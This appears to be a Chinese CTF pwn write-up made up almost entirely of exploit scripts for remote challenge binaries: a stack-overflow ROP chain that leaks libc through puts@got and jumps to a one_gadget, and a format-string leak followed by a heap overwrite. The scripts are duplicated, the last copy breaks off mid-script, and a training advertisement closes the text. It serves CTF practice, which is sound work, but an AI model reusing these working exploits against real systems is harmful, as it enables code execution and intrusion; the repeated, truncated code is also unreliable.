简单stack溢出
利用异常捕获机制绕过canary判断控制rbp达成利用
realloc利用,注意堆布局
当做记录本来想丢到专栏去的,但是专栏排版好像有些问题,就放到这里来凑数。
from PwnContext import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
if __name__ == '__main__':
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
ctx.binary = './pwn'
ctx.remote = ('47.111.104.99', 52206)
ctx.symbols = {
'dest':0x4000000,
}
ctx.breakpoints = [0x0401009, 0x40103F,0x040112E,0x4007D4]
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
rs('remote')
dbg()
ru('resting\n')
for i in range(16):
sl('32')
pop_rdi = 0x0401213
puts_plt = 0x400640
puts_got = 0x603018
ret = 0x40117F
payload = p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(ret)
s(payload)
libc = uu64(ru('\x7f',drop=False)[-6:])-0x6f6a0
lg('libc',libc)
one = libc + 0x4527a
payload = '\0'*8 + p64(one)[:6]
s(payload)
irt()
from PwnContext import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
if __name__ == '__main__':
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
ctx.binary = './pwn'
ctx.remote = ('47.111.104.99', 52206)
ctx.symbols = {
'dest':0x4000000,
}
ctx.breakpoints = [0x0401009, 0x40103F,0x040112E,0x4007D4]
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
rs('remote')
dbg()
ru('resting\n')
for i in range(16):
sl('32')
pop_rdi = 0x0401213
puts_plt = 0x400640
puts_got = 0x603018
ret = 0x40117F
payload = p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(ret)
s(payload)
libc = uu64(ru('\x7f',drop=False)[-6:])-0x6f6a0
lg('libc',libc)
one = libc + 0x4527a
payload = '\0'*8 + p64(one)[:6]
s(payload)
irt()
from PwnContext import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
if __name__ == '__main__':
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
ctx.binary = './pwn'
ctx.remote = ('47.111.96.55', 53404)
ctx.symbols = {
'node':0x202090,
}
ctx.breakpoints = [0x117C,0x11B8,0x12C2]
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
def add(content='\n'):
sla('>',2)
sa('note:\n',content)
def delete(idx):
sla('>',3)
sla('index>',idx)
def show_name():
sla('>',1)
def show():
sla('>',4)
rs('remote')
name = "%3$p"
sla('name: ',name)
show_name()
ru('Current user:')
libc = int(r(14),16)
lg('libc',libc)
base = libc - 0xf7380
malloc_hook = base + 0x3c4aed
payload = p64(base+0x45226)*10
add(payload+'\n')
add(payload+'\n')
delete(0)
delete(1)
dbg()
show()
ru('2:')
heap = uu64(r(6))
aim = heap + 0x10
lg('aim',aim)
sla('>',666)
payload = '0'*0x20+p64(aim+0x20)[:6]+'\n'
sa('want',payload)
irt()
from PwnContext import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
if __name__ == '__main__':
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
ctx.binary = './pwn'
ctx.remote = ('47.111.96.55', 53404)
ctx.symbols = {
'node':0x202090,
}
ctx.breakpoints = [0x117C,0x11B8,0x12C2]
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
def add(content='\n'):
sla('>',2)
sa('note:\n',content)
def delete(idx):
sla('>',3)
sla('index>',idx)
def show_name():
sla('>',1)
def show():
sla('>',4)
rs('remote')
name = "%3$p"
sla('name: ',name)
show_name()
ru('Current user:')
libc = int(r(14),16)
lg('libc',libc)
base = libc - 0xf7380
malloc_hook = base + 0x3c4aed
payload = p64(base+0x45226)*10
add(payload+'\n')
add(payload+'\n')
delete(0)
delete(1)
dbg()
show()
ru('2:')
heap = uu64(r(6))
aim = heap + 0x10
lg('aim',aim)
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
